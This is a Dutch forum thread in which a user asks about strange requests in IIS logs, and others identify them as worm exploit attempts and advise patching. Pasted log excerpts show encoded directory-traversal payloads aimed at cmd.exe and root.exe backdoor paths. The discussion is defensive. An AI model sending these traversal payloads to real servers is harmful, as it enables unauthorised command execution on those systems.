Toon posts:

Wat zijn dit voor logs?

Pagina: 1
Acties:

Verwijderd

Topicstarter
Ik krijg regelmatig rare gets in mn IIS logfiles te zien. Hieronder een stukje:

15:54:38 ***.***.***.*** /scripts/root.exe
15:54:38 ***.***.***.*** /MSADC/root.exe
15:54:40 ***.***.***.*** /c/winnt/system32/cmd.exe
15:54:40 ***.***.***.*** /d/winnt/system32/cmd.exe
15:54:42 ***.***.***.*** /scripts/..%c../winnt/system32/cmd.exe
15:54:42 ***.***.***.*** /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
15:54:43 ***.***.***.*** /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
15:54:44 ***.***.***.*** /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
15:54:44 ***.***.***.*** /scripts/..Á../winnt/system32/cmd.exe
15:54:46 ***.***.***.*** /scripts/winnt/system32/cmd.exe
15:54:47 ***.***.***.*** /winnt/system32/cmd.exe
15:54:48 ***.***.***.*** /winnt/system32/cmd.exe
15:54:48 ***.***.***.*** /scripts/..%5c../winnt/system32/cmd.exe
15:54:50 ***.***.***.*** /scripts/..%5c../winnt/system32/cmd.exe
15:54:51 ***.***.***.*** /scripts/..%5c../winnt/system32/cmd.exe
15:54:51 ***.***.***.*** /scripts/..%2f../winnt/system32/cmd.exe

Is dat iemand die exploits probeert? of staat er iets open ofzo?
Het rare is dat vandaag al 5 verschillende ip's dit gedaan hebben, lijkt me niet goed :(

  • Zwelgje
  • Registratie: November 2000
  • Laatst online: 20-01 19:37
exploits, gewoon iemand die je probeerd te hacken, hoef je je geen zorgen om te maken, tenminste als je de laatste patches hebt draaien, en je site goed heb geconfigged,

A wise man's life is based around fuck you


  • The Source
  • Registratie: April 2000
  • Laatst online: 20-02 20:31
Nu we toch bezig zijn... er is weer een nieuwe worm :)

Zie topic uit NOS: [topic=231310/1/60]

  • Expander
  • Registratie: Februari 2001
  • Niet online
zo iets stond tussen mijn 404 errors, net zoiets... Ik heb weleens gehoort van rootkits, weet niet precies maar kan het zoiets zijn? Dit lijkt namelijk erg op dat van Fuego, is misschien zelfs precies hetzelfde..

/scripts/root.exe?/c+dir 40 -
/MSADC/root.exe?/c+dir 39 -
/c/winnt/system32/cmd.exe?/c+dir 38 -
/d/winnt/system32/cmd.exe?/c+dir 37 -
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir 36 -
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 36 -
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 35 -
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 35 -
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir 35 -
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 35 -
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 34 -
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 34 -
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir 34 -
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir 33 -

Expanding the inexpandable


Verwijderd

Er gaat weer een nieuw wormpie rond sinds gister/vandaag. Alertstate: HIGH

Kijk ook eens http://www.security.nl/artikel.php3?id=2355

Verwijderd

Topicstarter
Ja ik ben er inmiddels ook achter, stond net op de FP

Heb voor de zekerheid die patchcollectie geinstalleerd (alle patches tegelijk dus) Ik kan je vertellen dat IIS zeeer grondig beveiligd is hoor, het start zelfs niet meer op :D
Normaal zou ik er niet zo blij mee zijn maar morgen komt de postbode met nieuw moederbord en processor B-) dus ik moest toch al opnieuw windows installen.
Pagina: 1